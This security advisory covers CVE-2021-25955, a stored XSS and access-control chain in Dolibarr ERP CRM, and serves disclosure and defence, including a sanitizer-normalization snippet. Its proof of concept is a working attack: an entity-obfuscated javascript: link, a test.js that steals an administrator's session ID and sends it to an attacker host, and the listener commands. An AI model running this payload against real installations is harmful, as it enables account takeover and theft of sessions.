CVE-2021-25955

Date: August 15, 2021

Overview

In “Dolibarr ERP CRM”, the WYSIWYG Editor module in versions 2.8.1 through 13.0.2 is affected by a stored XSS vulnerability that allows low-privileged application users to store malicious scripts in the “Private Note” field at the “/adherents/note.php?id=1” endpoint. The scripts execute in a victim’s browser when the victim opens the page that contains the vulnerable field. In the worst case the victim who inadvertently triggers the attack is a highly privileged administrator; the injected script can then extract the administrator’s session ID, which leads to full account takeover. Because of a second vulnerability (Improper Access Control on private notes), a low-privileged user is able to update private notes in the first place, so the two issues chain into privilege escalation.

Details

The WYSIWYG Editor module of “Dolibarr ERP CRM” allows a low-privileged application user to store a malicious script in the Private Note field at the “/adherents/note.php?id=1” endpoint. The script runs in the browser of any user who opens the page that contains the field.

If that user is a highly privileged administrator, the script can read the administrator’s session ID, which allows full account takeover. Combined with the second vulnerability (Improper Access Control on private notes), which lets a low-privileged user update private notes that should be out of their reach, the chain results in privilege escalation.

PoC Details

For demonstration purposes two users are used: “member1” (permissions “Read members” and “Create/modify members”) and “admin” (administrator).

1. Create a malicious JavaScript file (test.js) that reads the victim’s session ID and sends it to the attacker in a GET request.
2. Run the PHP built-in server to host the malicious file.
3. Run the Python simple HTTP server to receive the extracted session ID.
4. Log in to the application as member1.
5. Go to “My Dashboard” in the left pane and select member1 from the “Latest 5 members” section.
6. Open the “Note” tab from the navigation bar, edit the public note, enter the payload in the field and capture the request with a web proxy (for example Burp Suite).
7. In the captured request, change the three parameters that refer to the public note so that they refer to the private note, then forward the request. member1 has no way to edit private notes through the UI, but the server accepts the modified request (the Improper Access Control issue).
8. Log in as “admin” and open the same endpoint: a private note has been created.
9. The administrator clicks the link in the private note, which runs the malicious script.
10. The Python server on the attacker’s host receives the administrator’s session ID.
11. Using the captured session ID, the attacker can log in as the administrator.

PoC Code

// Payload (stored in the note field; the HTML character references and the %0d hide the javascript: scheme from the editor, the browser decodes them before following the link):

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;var re;x=new XMLHttpRequest;x.onload%0d=function(){var ur='http://192.168.18.37:8090/test.js';$.getScript(ur);};x.open('GET','http://192.168.18.36/');x.send();">Click to Get !!hacked!!</a>

// File (test.js) contents, served from the attacker host 192.168.18.37:8090 and loaded by the payload through the page's own jQuery ($.getScript):

// Matches runs of alphanumerics; used to pull the session ID token out of the matched line.
var te = /[0-9a-zA-Z]+/gm;
var re;
x = new XMLHttpRequest;
x.onload = function () {
    re = this.responseText;
    // The admin "System information" page prints the current "Session ID"; grab that line.
    var reg = /Session\sID\S+\s\S+/gm;
    console.log(((re.match(reg))[0].match(te))[6]);
    var sessionId = ((re.match(reg))[0].match(te))[6];
    // Exfiltrate the session ID to the attacker's listener.
    var url = "http://192.168.18.37:9999/" + sessionId;
    $.ajax(url);
};
// Fetch the admin page with the victim's cookies attached.
x.open('GET', 'http://192.168.18.36/admin/system/dolibarr.php', true);
x.withCredentials = true;
x.send(null);

// Command to run the Python simple HTTP server that receives the extracted Session ID (on the attacker host):

$ python3 -m http.server 9999

// Command to run the PHP built-in server that hosts the malicious file (test.js):

$ php -S 192.168.18.37:8090
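The payload above hides the javascript: scheme behind HTML character references (&Tab;, &NewLine;, &colon;), which the browser decodes before it parses the URL. The following Node.js snippet is an added example, not code from the advisory or from Dolibarr: it reproduces that decoding and the URL parser's whitespace stripping to recover the scheme the browser actually dispatches on, and contrasts a naive substring filter on the raw attribute text with an allowlist on the normalized scheme. The entity table, the allowlist and the extra sample hrefs are assumptions made for the illustration.

```javascript
// Added example (not part of the advisory or of Dolibarr): reproduce in Node
// the normalization a browser applies to an href before it resolves the URL
// scheme, and show why a substring filter for "javascript:" on the raw
// attribute text misses the payload from this advisory.

// The href value from the advisory's payload, as stored in the note.
const ADVISORY_HREF =
  'j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;var re;x=new XMLHttpRequest;';

// Named character references that matter here (assumed subset; HTML defines
// over 2000). Names are case-sensitive, as in HTML: &tab; is not a reference.
const NAMED_ENTITIES = {
  Tab: '\t', NewLine: '\n', colon: ':', sol: '/', semi: ';', nbsp: '\u00a0',
  lt: '<', gt: '>', amp: '&', quot: '"', apos: "'",
};

// Step 1: decode character references as the HTML parser does for an
// attribute value (named, decimal &#NN; and hexadecimal &#xNN; forms).
// Unknown names are left as literal text, which is also what browsers do.
function decodeAttributeValue(value) {
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z][a-z0-9]*);/gi, (whole, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
    }
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, body)
      ? NAMED_ENTITIES[body]
      : whole;
  });
}

// Step 2: URL parser preprocessing (WHATWG URL Standard): strip leading and
// trailing C0 controls and spaces, then remove every tab, LF and CR anywhere.
// This is what turns "j<TAB>a<TAB>v...<LF>ri<TAB>pt:" back into "javascript:".
function preprocessUrl(input) {
  return input
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

// Step 3: a scheme is an ASCII letter followed by letters, digits, '+', '-'
// or '.', terminated by ':'. Anything else is a relative URL (no scheme).
function extractScheme(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// The scheme the browser will actually dispatch on when the link is clicked.
function effectiveScheme(attributeValue) {
  return extractScheme(preprocessUrl(decodeAttributeValue(attributeValue)));
}

// The check that looks sufficient and is not: it inspects the raw attribute
// text, where the entities and tabs keep "javascript:" from ever appearing.
function naiveFilterBlocks(attributeValue) {
  return attributeValue.toLowerCase().includes('javascript:');
}

// The check that holds: allowlist the normalized scheme. Relative URLs
// (no scheme) are kept; javascript:, data:, vbscript: and the rest are not.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);
function isSafeHref(attributeValue) {
  const scheme = effectiveScheme(attributeValue);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Stand-alone run: compare both checks on the advisory payload and on a few
// variants constructed here for illustration.
if (typeof require !== 'undefined' && require.main === module) {
  const samples = [ADVISORY_HREF, '&#106;avascript:alert(1)', ' \tJaVaScRiPt:alert(1)',
                   'https://example.com/', '/adherents/note.php?id=1'];
  for (const href of samples) {
    console.log(JSON.stringify(href));
    console.log('  naive filter blocks:', naiveFilterBlocks(href),
                '| effective scheme:', effectiveScheme(href),
                '| allowlist accepts:', isSafeHref(href));
  }
}
```

The point for anyone writing or reviewing a sanitizer for rich-text fields such as these notes: a filter that looks at the raw attribute text is checking a string the browser never sees. Decode and normalize first, or better, drop the href entirely unless its normalized scheme is on an allowlist.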

Affected Environments

Dolibarr ERP CRM versions 2.8.1 through 13.0.2

Prevention

Upgrade to version 14.0.0

Language: PHP

Good to know:

Cross-Site Scripting (XSS)

CWE-79

CVSS v3.x Base Score: 9.0 (Critical), vector AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High

CVSS v2 Base Score: 6.0 (Medium), vector AV:N/AC:M/Au:S/C:P/I:P/A:P
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (Au): Single
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial